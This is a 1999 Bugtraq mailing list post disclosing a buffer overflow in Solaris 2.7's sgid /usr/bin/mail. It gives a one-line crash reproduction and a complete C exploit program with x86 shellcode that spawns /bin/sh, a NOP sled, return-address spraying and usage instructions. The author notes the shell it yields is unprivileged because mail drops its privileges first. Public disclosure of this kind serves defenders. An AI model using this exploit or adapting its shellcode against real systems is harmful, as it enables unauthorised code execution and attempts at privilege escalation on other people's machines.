Bugtraq mailing list archives
Solaris 2.7 /usr/bin/mail
From: btellier () WEBLEY COM (Brock Tellier)
Date: Mon, 13 Sep 1999 11:22:14 -0500
Greetings, There is a possible buffer overflow vulnerability in Solaris 2.7's sgid mail /usr/bin/mail. The reason it's only a possibility and not a full blow exploit is that mail drops sgid privs before the overflow occurs. However as we've seen in several past posts, this is not necessarily a bulletproof method of making ones program secure. Obviously mail needs these privs to perform some function, probably opening the appropriate mail owned files to deliver mail. My guess would be that in the following usage, mail would need write (read?) access to foo's mail file. bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo . mail: ERROR signal 11 bash-2.02$ In any case, this overflow does allow execution of any command you wish as shown in the program at the end of this message. I would imagine that with some careful asm code, one would be able to exploit the specific vulnerability that may exist. Information on exactly what mail does with it's s bit would be helpful. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com --- solx86.c --- /* * Generic Solaris x86 exploit program by Brock Tellier * Shellcode by Cheez Whiz * gcc -o mailex solx86.c * /usr/bin/mail -m `./mailex 0 1985 2285` foo . <period, enter> $ <not a rootshell ;)> * Usage: ./mailex <offset> <NOPS> <BUFSIZE> * * Demonstrative program for mail vulnerability. mail apparently drops privs * before the overflow occurs so we're not going to have a sgid mail shell. * Perhaps someone could make some 'shellcode' to exploit an open file * descriptor or something (whatever the reason mail is sgid mail). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUF 10000 #define NOP 0x90 char shell[] = "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46" "\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0" "\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83" "\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53" "\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8" "\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68\xff\xff\xff\xff\xff\xff\xff\xff" "\xff"; unsigned long int nop; unsigned long int esp; long int offset; char buf[BUF]; unsigned long int get_esp() { __asm__("movl %esp,%eax"); } void main (int argc, char *argv[]) { int buflen, i; if (argc > 1) offset = strtol(argv[1], NULL, 0); if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285; if (argc > 3) buflen=atoi(argv[3]); else buflen=BUF; esp = get_esp(); memset(buf, NOP, buflen); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < buflen-4; i += 4) *((int *) &buf[i]) = esp+offset; for (i = 0; i < strlen(buf); i++) putchar(buf[i]); return; } ---
Current thread:
- Re: Redhat 6.0 Password Issues, (continued)
- Re: Redhat 6.0 Password Issues Erik Parker (Sep 11)
- Re: Redhat 6.0 Password Issues Alan Brown (Sep 11)
- CGI security Kerb (Sep 12)
- Re: CGI security Ivo van der Wijk (Sep 13)
- Re: CGI security Vladimir Dubrovin (Sep 14)
- Re: CGI security Arturo Busleiman (Sep 14)
- Multiple vulnerabilities in CDE Job de Haas (Sep 13)
- Re: Multiple vulnerabilities in CDE Troy A. Bollinger (Sep 13)
- Re: Multiple vulnerabilities in CDE Dan Astoorian (Sep 14)
- Vulnerability in dtspcd Job de Haas (Sep 13)
- Solaris 2.7 /usr/bin/mail Brock Tellier (Sep 13)
- Stack Shield 0.5 beta vendicator () USA NET (Sep 13)
- Re: Redhat 6.0 Password Issues Scott Manley (Sep 12)
- Re: Redhat 6.0 Password Issues Roger Espel Llima (Sep 12)
- Vulnerability in dtsession Job de Haas (Sep 13)